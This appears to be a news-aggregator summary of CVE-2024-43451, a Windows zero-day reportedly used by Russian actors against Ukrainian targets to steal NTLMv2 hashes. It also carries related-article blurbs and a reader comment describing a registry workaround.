Windows Zero-Day Exploited by Russia Triggered with File Drag-and-Drop, Delete
A newly discovered Windows zero-day vulnerability (CVE-2024-43451) has been exploited by Russian threat actors, targeting Ukrainian entities through phishing, allowing NTLMv2 hash theft with minimal user interaction.
Read original article
A newly discovered zero-day vulnerability in Windows, tracked as CVE-2024-43451, has been exploited by suspected Russian threat actors, particularly targeting Ukrainian entities. This medium-severity flaw affects the MSHTM engine, which is utilized by the Edge browser in Internet Explorer mode and other applications. The exploit can be triggered with minimal user interaction, such as deleting or drag-and-dropping files, or right-clicking on them. Successful exploitation allows attackers to steal NTLMv2 hashes, enabling pass-the-hash attacks to authenticate as the targeted user. ClearSky, the cybersecurity firm that identified the flaw, reported it to Microsoft in June 2024. The attackers used phishing emails from a compromised Ukrainian government server, prompting victims to download malicious ZIP files containing a PDF and a URL file designed to exploit this vulnerability. The URL file connects to an external server to download additional malicious files, including SparkRAT malware. The vulnerability is more easily exploited on Windows 10 and 11 compared to older versions. The Computer Emergency Response Team of Ukraine (CERT-UA) has linked the exploitation of this zero-day to a threat actor known as UAC-0194.
- A new Windows zero-day vulnerability (CVE-2024-43451) has been exploited by Russian threat actors.
- The exploit requires minimal user interaction, such as file deletion or right-clicking.
- Successful exploitation allows attackers to steal NTLMv2 hashes for authentication.
- The vulnerability primarily targets Ukrainian entities through phishing attacks.
- It is more easily exploited on Windows 10 and 11 than on older versions.
Related
About that Windows Installer 'make me admin' security hole. How it's exploited
Microsoft patched a critical Windows Installer vulnerability, CVE-2024-38014, allowing privilege escalation. SEC Consult released a tool to identify vulnerable files, urging users to apply the patch promptly.
Microsoft Says Windows Update Zero-Day Being Exploited to Undo Security Fixes
Microsoft warns of a critical vulnerability, CVE-2024-43491, in Windows 10, version 1507, exploited to reverse security fixes. Users should install specific updates. Adobe also issued patches for critical flaws.
Exploit Released for New Windows Server "WinReg" NTLM Relay Attack
A proof-of-concept exploit for Microsoft's CVE-2024-43532 vulnerability allows NTLM relay attacks, affecting Windows Server 2008-2022 and Windows 10/11, with detection methods recommended by researchers.
Windows Themes zero-day bug exposes users to NTLM credential theft
A zero-day vulnerability in Windows Themes, CVE-2024-38030, allows NTLM credential theft through malicious theme files. Acros Security offers a micropatch, while Microsoft has not announced an official fix timeline.
Russian spies use remote desktop protocol files in unusual mass phishing drive
Microsoft reported a mass phishing campaign by the Russian SVR's Midnight Blizzard group, targeting various organizations with RDP file attachments in emails, potentially exposing sensitive data and enabling malware installation.
2 comments- 009862a0-0000-0000-c000-000000005986
- 009862a0-0000-0000-c000-000000000046
i was able to replicate the network traffic by selecting the file; and a quick-n-dirty fix is to rename HKCR\.URL and HKCR\InternetShortcut (i just appended _bak to them); restarted all explorer.exe's and it no longer tries to make connection attempt
edit: formatting
Related
About that Windows Installer 'make me admin' security hole. How it's exploited
Microsoft patched a critical Windows Installer vulnerability, CVE-2024-38014, allowing privilege escalation. SEC Consult released a tool to identify vulnerable files, urging users to apply the patch promptly.
Microsoft Says Windows Update Zero-Day Being Exploited to Undo Security Fixes
Microsoft warns of a critical vulnerability, CVE-2024-43491, in Windows 10, version 1507, exploited to reverse security fixes. Users should install specific updates. Adobe also issued patches for critical flaws.
Exploit Released for New Windows Server "WinReg" NTLM Relay Attack
A proof-of-concept exploit for Microsoft's CVE-2024-43532 vulnerability allows NTLM relay attacks, affecting Windows Server 2008-2022 and Windows 10/11, with detection methods recommended by researchers.
Windows Themes zero-day bug exposes users to NTLM credential theft
A zero-day vulnerability in Windows Themes, CVE-2024-38030, allows NTLM credential theft through malicious theme files. Acros Security offers a micropatch, while Microsoft has not announced an official fix timeline.
Russian spies use remote desktop protocol files in unusual mass phishing drive
Microsoft reported a mass phishing campaign by the Russian SVR's Midnight Blizzard group, targeting various organizations with RDP file attachments in emails, potentially exposing sensitive data and enabling malware installation.